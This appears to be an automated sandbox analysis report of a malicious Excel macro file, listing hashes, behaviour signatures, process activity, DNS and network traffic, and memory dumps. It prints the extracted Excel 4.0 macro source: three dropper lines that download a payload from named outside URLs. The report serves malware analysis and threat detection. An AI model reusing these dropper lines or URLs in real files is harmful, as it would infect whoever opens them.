Analysis

  • max time kernel
    184s
  • max time network
    191s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    12-05-2022 16:29

General

  • Target

    ?i=1zjqrjjyu.xlsm

  • Size

    83KB

  • MD5

    cf82eec9632dc53d54c38f1d7b8a1b71

  • SHA1

    7b7e3339a8e857f1525341c074571ee7d7e9dd7f

  • SHA256

    9fbfeb3873dee627be46cf7c10015435d027d718dd42a7842badd45e590f782b

  • SHA512

    346297dc7ce5b9caf84b766e40339372012f3401f010a7473a52cdb9a56027bdef53869a7aa543b67aa890536d442ed718583b04a7328302a164b7dba6f6dd29

Score
10/10

Malware Config

Extracted

Language
xlm4.0

Source
  1. =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://yuanbinglun.com/www.yuanbinglun.com/7kKwqmxRWQK0OLi/", "..\dwa.ocx")
  2. =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://laserjetprintersreview.xyz/wp-includes/BJ6yUJ/", "..\dwa.ocx")
  3. =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://2021.posadamision.com/wp-admin/IoqaL08/", "..\dwa.ocx")
URLs
xlm40.dropper

http://yuanbinglun.com/www.yuanbinglun.com/7kKwqmxRWQK0OLi/

xlm40.dropper

http://laserjetprintersreview.xyz/wp-includes/BJ6yUJ/

xlm40.dropper

http://2021.posadamision.com/wp-admin/IoqaL08/

Signatures

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\_i=1zjqrjjyu.xlsm"
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2284

Network

  • DNS 96.108.152.52.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 96.108.152.52.in-addr.arpa IN PTR
    Response:
  • DNS yuanbinglun.com (EXCEL.EXE)
    Remote address: 8.8.8.8:53
    Request: yuanbinglun.com IN A
    Response: yuanbinglun.com IN A 101.200.218.166
  • DNS 2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    Remote address: 8.8.8.8:53
    Request: 2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa IN PTR
    Response:
  • DNS laserjetprintersreview.xyz (EXCEL.EXE)
    Remote address: 8.8.8.8:53
    Request: laserjetprintersreview.xyz IN A
    Response:
  • DNS 2021.posadamision.com (EXCEL.EXE)
    Remote address: 8.8.8.8:53
    Request: 2021.posadamision.com IN A
    Response:
  • 2.22.22.99:443
    tls
    46 B
    71 B
    1
    1
  • 2.22.22.96:443
    tls
    46 B
    71 B
    1
    1
  • 2.22.22.96:443
    tls
    46 B
    71 B
    1
    1
  • 2.22.22.96:443
    tls
    46 B
    71 B
    1
    1
  • 93.184.220.29:80
    46 B
    40 B
    1
    1
  • 93.184.220.29:80
    322 B
    7
  • 93.184.220.29:80
    260 B
    5
  • 13.69.239.73:443
    322 B
    7
  • 40.125.122.151:443
    260 B
    5
  • 93.184.220.29:80
    260 B
    5
  • 204.79.197.203:80
    322 B
    7
  • 101.200.218.166:80
    yuanbinglun.com
    EXCEL.EXE
    260 B
    5
  • 8.238.111.254:80
    322 B
    7
  • 8.238.111.254:80
    322 B
    7
  • 8.8.8.8:53
    96.108.152.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    96.108.152.52.in-addr.arpa

  • 8.8.8.8:53
    yuanbinglun.com
    dns
    EXCEL.EXE
    61 B
    77 B
    1
    1

    DNS Request

    yuanbinglun.com

    DNS Response

    101.200.218.166

  • 8.8.8.8:53
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    dns
    118 B
    204 B
    1
    1

    DNS Request

    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa

  • 8.8.8.8:53
    laserjetprintersreview.xyz
    dns
    EXCEL.EXE
    72 B
    137 B
    1
    1

    DNS Request

    laserjetprintersreview.xyz

  • 8.8.8.8:53
    2021.posadamision.com
    dns
    EXCEL.EXE
    67 B
    143 B
    1
    1

    DNS Request

    2021.posadamision.com

MITRE ATT&CK Enterprise v6

Downloads

  • memory/2284-132-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-131-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-130-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-133-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-134-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-135-0x00007FFD28750000-0x00007FFD28760000-memory.dmp

    Filesize

    64KB

  • memory/2284-136-0x00007FFD28750000-0x00007FFD28760000-memory.dmp

    Filesize

    64KB

  • memory/2284-138-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-139-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-140-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-141-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB
